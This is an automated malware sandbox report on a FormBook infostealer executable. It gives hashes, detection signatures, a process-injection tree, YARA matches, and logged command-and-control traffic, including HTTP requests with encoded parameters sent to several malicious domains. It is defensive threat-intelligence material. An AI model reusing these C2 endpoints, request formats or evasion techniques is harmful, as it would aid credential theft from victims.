
Windows Analysis Report
IBbGrGi4A7.exe

Overview

General Information

Sample name: IBbGrGi4A7.exe (renamed because the original name is a hash value)
Original sample name: 9bd2e65b401b992b241c29fc198f6b1bb3e8b2d75d6b3a1669bd5017e51c7c26.exe
Analysis ID: 1634593
MD5: f9cba39579a665bb04f9d3eb0870cba1
SHA1: faf02ae8271b30cf1a41b625efe4262ba103f9c8
SHA256: 9bd2e65b401b992b241c29fc198f6b1bb3e8b2d75d6b3a1669bd5017e51c7c26
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • IBbGrGi4A7.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\IBbGrGi4A7.exe" MD5: F9CBA39579A665BB04F9D3EB0870CBA1)
    • svchost.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\IBbGrGi4A7.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • L0o39BrLvRQHRGJJTVHX4K.exe (PID: 5712 cmdline: "C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\7MqrhSJQHs.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • takeown.exe (PID: 5468 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • L0o39BrLvRQHRGJJTVHX4K.exe (PID: 5580 cmdline: "C:\Program Files (x86)\zrqihSMwRJsYwIJMqTIvnymdjFXqbSAGCWhEiUAhds\2W5uMBiP1My.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 6020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ParentImage: C:\Users\user\Desktop\IBbGrGi4A7.exe, ParentProcessId: 6924, ParentProcessName: IBbGrGi4A7.exe, ProcessCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ProcessId: 7104, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ParentImage: C:\Users\user\Desktop\IBbGrGi4A7.exe, ParentProcessId: 6924, ParentProcessName: IBbGrGi4A7.exe, ProcessCommandLine: "C:\Users\user\Desktop\IBbGrGi4A7.exe", ProcessId: 7104, ProcessName: svchost.exe
                No Suricata rule has matched


                AV Detection

Source: IBbGrGi4A7.exe | Avira: detected
Source: http://www.nan21.net/qgyh/?LbXlyPpp=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DXhhfyTehnr5bskVH0czEjLoaQIeNBdlHr4z+9MzW+HgKHgH/9TjKbe&kV=9tSDAbLP667x | Avira URL Cloud: Label: malware
Source: http://www.multo.xyz/7pb3/ | Avira URL Cloud: Label: malware
Source: http://www.nan21.net/qgyh/ | Avira URL Cloud: Label: malware
Source: http://www.multo.xyz/7pb3/?kV=9tSDAbLP667x&LbXlyPpp=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liOLlrHSxOnkcsQMl+oK38ZsgNCmZo1D3bCrfweDL3zmilAYdarfI3Zc | Avira URL Cloud: Label: malware
Source: IBbGrGi4A7.exe | ReversingLabs: Detection: 68%
Source: IBbGrGi4A7.exe | Virustotal: Detection: 73%
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3330191796.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3330168283.0000000000DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1066377922.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3328376409.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1066813135.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3330359905.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1066016609.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3330036627.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: IBbGrGi4A7.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000001.00000003.1033624904.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033428630.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1033641693.0000000003026000.00000004.00000020.00020000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329711852.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IBbGrGi4A7.exe, 00000000.00000003.867583782.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, IBbGrGi4A7.exe, 00000000.00000003.866481288.0000000003920000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.966581193.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1066415104.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.964597419.0000000003300000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 00000003.00000003.1068446163.0000000002D7D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000003.1065992172.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.00000000030CE000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330435990.0000000002F30000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: takeown.exe, 00000003.00000002.3328687494.00000000029EE000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000003.00000002.3330925884.000000000355C000.00000004.10000000.00040000.00000000.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330637101.000000000275C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1375975018.00000000152DC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: L0o39BrLvRQHRGJJTVHX4K.exe, 00000002.00000002.3329449489.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp, L0o39BrLvRQHRGJJTVHX4K.exe, 00000005.00000002.3330485725.0000000000F4F000.00000002.00000001.01000000.00000005.sdmp
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037445A
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037C6D1 FindFirstFileW,FindClose,0_2_0037C6D1
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0037C75C
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037EF95
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0037F0F2
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037F3F3
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003737EF
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_00373B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00373B12
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_0037BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0037BCBC
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 3_2_0258C380 FindFirstFileW,FindNextFileW,FindClose,3_2_0258C380
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 4x nop then xor eax, eax 3_2_02579DD0
Source: C:\Windows\SysWOW64\takeown.exe | Code function: 4x nop then mov ebx, 00000004h 3_2_02DC04F8

                Networking

Source: DNS query: www.sislieskort.xyz
Source: DNS query: www.dolfisstillspinnin.xyz
Source: DNS query: www.multo.xyz
Source: Joe Sandbox View | IP Address: 3.125.36.175 (2 entries)
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (8 occurrences)
Source: C:\Users\user\Desktop\IBbGrGi4A7.exe | Code function: 0_2_003822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003822EE
Source: global traffic | HTTP traffic detected: GET /glm7/?LbXlyPpp=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/pleOey0sc8S0ib7OOh7z7fGv7sMnhuGQuR1OqqP/gFu6SjBFzp/nPU1r&kV=9tSDAbLP667x HTTP/1.1 | Host: www.sislieskort.xyz | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /qgyh/?LbXlyPpp=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DXhhfyTehnr5bskVH0czEjLoaQIeNBdlHr4z+9MzW+HgKHgH/9TjKbe&kV=9tSDAbLP667x HTTP/1.1 | Host: www.nan21.net | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /a669/?kV=9tSDAbLP667x&LbXlyPpp=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9rlITGUcf3IDt8IN8iuUtzhkIqtflv5uvSpmjHt/ELf0cmfR80FVkQrxF HTTP/1.1 | Host: www.rbopisalive.cyou | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /z4h6/?LbXlyPpp=oPD5yFZP7wctr4H+UTXo8U1sQMLypPPPi/lke/3f4LEIiJw/NGa43dXYK61sC1fT5ul8W7mIEEjnBlsOqjdznugcKQdiSd/wXofryMQWvD5YoPjAEedRmMDhWexrbX1Mw92hr2mQUP2y&kV=9tSDAbLP667x HTTP/1.1 | Host: www.dolfisstillspinnin.xyz | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /7pb3/?kV=9tSDAbLP667x&LbXlyPpp=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liOLlrHSxOnkcsQMl+oK38ZsgNCmZo1D3bCrfweDL3zmilAYdarfI3Zc HTTP/1.1 | Host: www.multo.xyz | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /6sso/?LbXlyPpp=5FYyPsJYL9mEwCZYVUnKPFrY8+hnQKVbJI6dHZrolSWgUyhhuZcUC37k5jyocUOOYHYjhpJnfRuNQT4n0jS+7YRDnIft8iMUEvGwfVjhhqn2us8yCCnuzBi/MN+sqdUphmSVyeeEJlEm&kV=9tSDAbLP667x HTTP/1.1 | Host: www.zenilow.site | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected: GET /37iq/?kV=9tSDAbLP667x&LbXlyPpp=W4F2zohB5pQ72r97CGdqxaJtVP2Tx0vwqEbNWqUJsjhZovGOMKQzdy5mphqfsmmmu4a+Cp8WVxz5WDDoq4ZXIJFY8IQdAPpDun87GDn75NZxeCSKPVWYskYW1N4aqYZjQGTWdEFlHIyP HTTP/1.1 | Host: www.kakeksakti43.cfd | Accept: */* | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.sislieskort.xyz
Source: global traffic | DNS traffic detected: DNS query: www.nan21.net
Source: global traffic | DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic | DNS traffic detected: DNS query: www.dolfisstillspinnin.xyz
Source: global traffic | DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic | DNS traffic detected: DNS query: www.zenilow.site
Source: global traffic | DNS traffic detected: DNS query: www.kakeksakti43.cfd
Source: global traffic | DNS traffic detected: DNS query: www.kakeksakti12.cfd
Source: unknown | HTTP traffic detected: POST /qgyh/ HTTP/1.1 | Host: www.nan21.net | Accept: */* | Accept-Language: en-US | Accept-Encoding: gzip, deflate, br | Origin: http://www.nan21.net | Cache-Control: max-age=0 | Content-Length: 221 | Content-Type: application/x-www-form-urlencoded | Connection: close | Referer: http://www.nan21.net/qgyh/ | User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:02:58 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BKVSNZKA79C1Z2P9W380DContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4b 56 53 4e 5a 4b 41 37 39 43 31 5a 32 50 39 57 33 38 30 44 Data Ascii: Not Found - Request ID: 01JP1BKVSNZKA79C1Z2P9W380D
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:03:01 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BKY8VXKZXSF9ANGMN5YPZContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4b 59 38 56 58 4b 5a 58 53 46 39 41 4e 47 4d 4e 35 59 50 5a Data Ascii: Not Found - Request ID: 01JP1BKY8VXKZXSF9ANGMN5YPZ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:03:03 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BM0RNVTGHC33S54MDYZ82Content-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4d 30 52 4e 56 54 47 48 43 33 33 53 35 34 4d 44 59 5a 38 32 Data Ascii: Not Found - Request ID: 01JP1BM0RNVTGHC33S54MDYZ82
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:03:06 GMTServer: NetlifyX-Nf-Request-Id: 01JP1BM38C4863H7RA6YRCTF3MContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 42 4d 33 38 43 34 38 36 33 48 37 52 41 36 59 52 43 54 46 33 4d Data Ascii: Not Found - Request ID: 01JP1BM38C4863H7RA6YRCTF3M
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:24 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div 
class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:03:27 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 